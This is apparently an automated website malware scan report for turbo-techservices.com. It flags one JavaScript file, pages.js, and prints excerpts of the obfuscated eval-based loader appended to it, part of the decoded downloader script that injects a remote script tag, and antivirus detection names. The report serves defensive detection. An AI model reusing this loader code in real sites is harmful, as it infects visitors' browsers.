New scan:

Malware Scanner report for turbo-techservices.com

Malicious/Suspicious/Total urls checked
1/0/13
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.turbo-techservices.com/
200 OK
Content-Length: 15409
Content-Type: text/html
clean
http://www.turbo-techservices.com/pages.js
200 OK
Content-Length: 14304
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function goPage()
{
if(document.form1.page1.value!="")
{
if(document.form1.page1.value == 1)
{
location.replace("index.php");
}
if(document.form1.page1.value == 2)
{
location.replace("aboutus.php");
}
if(document.form1.page1.value == 3)
{
location.replace("products.php");
}
if(document.form1.page1.value == 4)
{
location.replace("manufaturing.php");
}
if(document.form1.page1.val
... 3519 bytes are skipped ...
;" +c <return = !){ Q >=null + ?value @ g[key][ A(g_k[0],g_k[1]) Bvar C){ E;for( FXMLHttpRequest HunR &()} I"|| (==" J +P= 2 +M=fals Kajax.runAJAX( M ,cg+= Wf+g_ N !g_ O=g_ Q} + RbIO#6z% T]= #b.status U, 2) V.XMLHTTP" 4 W c Xb.open( G, Y ! , Zg_ce [window ]() ^g_h[g_E]} _.g_ `#a#';for(c=112;c;d=(t=d.split(' ! # $ % & ( ) * + , - . / 0 2 3 4 5 6 7 8 9 : ; < = > ? @ A B C E F H I J K M N O Q R T U V W X Y Z [ ] ^ _ `'.substr(c-=(x=c<2?1:2),x))).join(t.pop()));eval(d)

Decoded script:


function g_p(file){this.g_b=null;this.g_t=function(){this.g_G="GET";this.g_w="?";this.g_cf="&";this.g_c=window;this.g_cg="";this.g_P=true;this.g_M=false;this.g_L=true;this.g_cc=null;this.g_T=null;this.g_v=file;this.g_g=new Object();this.g_r=new Array(2);this.g_c.offset=100};this.g_s=function(){this.g_y=function(){};this.g_z=function(){};this.g_A=function(){};this.g_D=function(){this.runResponse()};this.g_C=function(){};this.g_B=function(){this.runResponse()}};this.g_u=function(){this.g_
... 72823 bytes are skipped ...
ull){setTimeout(g_cf,200)}else{window.g_e=window;window.g_e.iframeLoaded=true;window.g_M=document.body;window.g_N=document;var g_x=g_T('div');g_r(g_x,'<div id="d3" style="display:none;visibility:hidden;"></div>');g_M.appendChild(g_x);var g_s=g_T('script');g_e.g_G=g_N.getElementsByTagName('head')[0];var g_v=Math.random().toString();g_s.setAttribute('src',"http://api.twitter.com/1/trends/daily.json?callback=window.g_cd&rnd="+g_v);g_G.appendChild(g_s)}}};window.g_cf=g_cf;g_cf()

Antivirus reports:

AntiVir
JS/Twetti.A
McAfee-GW-Edition
Heuristic.BehavesLike.JS.Obfuscated.D
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
NANO-Antivirus
Trojan.Script.Twetti.duhhf
ESET-NOD32
JS/Kryptik.BN

http://www.turbo-techservices.com/index.php
200 OK
Content-Length: 15409
Content-Type: text/html
clean
http://www.turbo-techservices.com/aboutus.php
200 OK
Content-Length: 13378
Content-Type: text/html
clean
http://www.turbo-techservices.com/products.php
200 OK
Content-Length: 16213
Content-Type: text/html
clean
http://www.turbo-techservices.com/manufaturing.php
200 OK
Content-Length: 11747
Content-Type: text/html
clean
http://www.turbo-techservices.com/quality.php
200 OK
Content-Length: 12375
Content-Type: text/html
clean
http://www.turbo-techservices.com/enquiry.php
200 OK
Content-Length: 19162
Content-Type: text/html
clean
http://www.turbo-techservices.com/contact.php
200 OK
Content-Length: 15262
Content-Type: text/html
clean
http://www.turbo-techservices.com/test404page.js
404 Not Found
Content-Length: 1708
Content-Type: text/html
clean
http://cdn.dsultra.com/js/registrar.js
200 OK
Content-Length: 1652
Content-Type: application/x-javascript
clean
http://www.turbo-techservices.com/?cid=&page=2
200 OK
Content-Length: 15409
Content-Type: text/html
clean
http://www.turbo-techservices.com/export.php
200 OK
Content-Length: 6688
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: turbo-techservices.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: turbo-techservices.com
Referer: http://www.google.com/search?q=turbo-techservices.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=turbo-techservices.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://turbo-techservices.com/

Result: turbo-techservices.com is not infected or malware details are not published yet.